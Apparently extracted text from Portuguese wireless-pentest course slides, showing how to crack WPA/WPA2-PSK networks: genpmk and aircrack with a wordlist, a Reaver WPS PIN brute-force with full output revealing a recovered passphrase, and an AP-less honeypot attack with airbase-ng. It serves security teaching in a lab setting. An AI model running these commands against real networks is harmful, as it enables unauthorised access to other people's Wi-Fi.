Wireless Pentest

WPA & WPA2

Instrutor

Marcos Pitangamarcos.pitanga@gmail.com

Wireless Protected Access

Um pouco mais de teoria…

WPA - Pre-Shared Key

WPA - Pre-Shared Key

Um pouco mais de teoria…

Um pouco mais de teoria…

Ataque WPA

Ataque WPA

Ataque WPA

Ataque WPA

Ataque WPA

Decriptando WPA - PSK

WPA2 - PSK

• Usa os mesmos princípios do WPA• A fraqueza é baseada na frase escolhida• Mais nada a ser dito !!!!!• Procedimento igual ao anterior

Acelerando o processo de Cracking

• Nós podemos pré-calcular a PMK para um dado SSID e uma wordlist usando a ferramenta genpmk

• genpmk -f /pentest/passwords/wordlists/darkc0de. lst -d PMK-Wireless-Lab -s "Wireless Lab“

• Vamos criar uma rede WPA-PSK com a senha skysign e capture o WPA-handshake desta rede

Acelerando o processo de Cracking

Meça o tempo levado com aircrack e compare…

Usando PMK com aircrack

Pyrit para sistemas MultiCPU

Como o Reaver funciona?

• Explora a vulnerabilidade no WPS – Wi-Fi Protected Setup (WPS)• Força bruta em PIN’s para relevar as senhas do WPA ou WPA2• Leva de 4 a 10 horas• Não funciona em todos os AP’s

Crackeando via Reaver1)airmon-ng start wlan02) airodump-ng mon0No outro terminal3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv

Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 34:08:04:C0:B6:4E[+] Switching mon0 to channel 11[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[!] WARNING: Receive timeout occurred[+] Sending WSC NACK[!] WPS transaction failed (code: 0x02), re-trying last pin[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message

Crackeando via Reaverroot@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v

Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 34:08:04:C0:B6:4E

[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)[+] Trying pin 12345670

[+] Trying pin 00005678[+] Trying pin 01235678[+] Trying pin 11115670[+] Trying pin 22225672[+] Trying pin 33335674[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)[+] Trying pin 44445676[+] Trying pin 55555678[+] Trying pin 66665670[+] Trying pin 77775672[+] Trying pin 88885674[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)[+] Trying pin 99995676[+] Trying pin 00015677[+] Trying pin 00025676[+] Trying pin 00035675

Crackeando via Reaver• root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353

Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11[+] Waiting for beacon from 34:08:04:C0:B6:4E[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)

[+] Trying pin 22838353[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message

[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending WSC NACK[+] Sending WSC NACK[+] Pin cracked in 3 seconds[+] WPS PIN: '22838353'[+] WPA PSK: 'DECADA1234'[+] AP SSID: 'multipinguim-2'[+] Nothing done, nothing to save.

Conectando a uma rede WPAwpa-supp.conf

Conectando a uma rede WPA

Cracking AP-less WPA Personal

• Para fazermos um crack no WPA precisamos do 4 handshake:– Authenticator Nounce, Supplicante Nounce, Authenticator MAC, Supplicant

MAC.– Só que para este ataque não precisamos de todos estes pacotes:

• Ou pacote 1 & 2 ou pacotes 2 & 3

• Para crackear precisamos então do WPA-PSK honeypot para então ele conectar-se, somente precisamos da msg 1 e msg 2.

• Não precisamos saber nenhuma frase secreta ;-)

Cracking AP-less WPA Personal

1) Configurando nosso honeypot airbase-ng -c 3 -a <AP> -e “Wireless Lab” -W 1 -z 2 mon0

2) Iniciamos o airodumpairodumo-ng -c 3 –bssid <AP> --write sem-AP-WPA-cracking mon0

3) Volte a tela do airbase e observe os clientes se associando4) Volte a tela do airodump e veja se pegou o WPA Handshake5) Rode o aircrack agoraaircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap